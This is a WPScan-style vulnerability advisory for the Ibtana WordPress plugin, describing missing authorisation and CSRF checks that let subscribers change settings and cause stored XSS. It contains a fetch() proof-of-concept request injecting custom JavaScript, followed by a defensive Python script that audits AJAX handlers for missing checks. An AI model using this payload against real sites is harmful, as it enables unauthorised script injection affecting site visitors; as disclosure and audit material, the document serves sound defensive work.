wpvulndb
Krzysztof Zając
WPVDB-ID: 63C58D7F-8E0B-4AA5-B3C8-8726B4F19BF1
Jan 12, 2022 - 12:00 a.m.

Ibtana < 1.1.4.9 - Subscriber+ Settings Update to Stored XSS

wpscan.com
EPSS: 0.001 (Low), percentile 24.8%

The plugin does not have authorisation and CSRF checks in the ive_save_general_settings AJAX action, allowing any authenticated user, such as a subscriber, to call it and change the plugin's settings, which could lead to a Stored Cross-Site Scripting issue. Note: v1.1.4.7 added the CSRF check; authorisation was added in 1.1.4.9.

PoC

fetch("http://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=ive_save_general_settings&ive_custom_js=alert(/XSS/)",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

The XSS will be triggered in all frontend pages in the Pro version.
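For reviewing plugin code for the missing checks described above, here is an added example (not part of the advisory and not the plugin's code): a small Python audit that lists wp_ajax_* callbacks which never call a nonce check or current_user_can(). The PHP sample, its demo_* handler names, option name and nonce action are constructed for illustration.

```python
import re

# Constructed PHP sample (hypothetical handlers, not Ibtana's code): the first
# AJAX callback has no checks, the second verifies a nonce and a capability.
SAMPLE_PHP = r'''
add_action( 'wp_ajax_demo_save_settings', 'demo_save_settings' );
function demo_save_settings() {
    update_option( 'demo_custom_js', wp_unslash( $_POST['demo_custom_js'] ) );
    wp_send_json_success();
}
add_action( 'wp_ajax_demo_save_settings_fixed', 'demo_save_settings_fixed' );
function demo_save_settings_fixed() {
    check_ajax_referer( 'demo_save_settings', 'nonce' );   // CSRF check
    if ( ! current_user_can( 'manage_options' ) ) {        // authorisation
        wp_send_json_error( 'forbidden', 403 );
    }
    update_option( 'demo_custom_js', wp_unslash( $_POST['demo_custom_js'] ) );
    wp_send_json_success();
}
'''

HOOK_RE = re.compile(r"add_action\(\s*'wp_ajax_(\w+)'\s*,\s*'(\w+)'")
CHECKS = {
    "csrf": ("check_ajax_referer(", "wp_verify_nonce("),
    "authorisation": ("current_user_can(",),
}

def function_body(source, name):
    """Return the text inside `function name(...) {...}` (naive brace matching)."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", source)
    if not m:
        return ""
    depth, i = 1, m.end()
    while i < len(source) and depth:
        depth += {"{": 1, "}": -1}.get(source[i], 0)
        i += 1
    return source[m.end():i - 1]

def audit_ajax_handlers(source):
    """Map each wp_ajax_* action to the checks its callback never calls."""
    findings = {}
    for action, func in HOOK_RE.findall(source):
        body = function_body(source, func).replace(" ", "")
        missing = [check for check, calls in CHECKS.items()
                   if not any(call in body for call in calls)]
        if missing:
            findings[action] = missing
    return findings
```

A callback that has only the nonce check, the state the note above describes for v1.1.4.7, is still reported as missing authorisation.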

CPE
Name: ibtana-visual-editor
Operator: lt
Version: 1.1.4.9
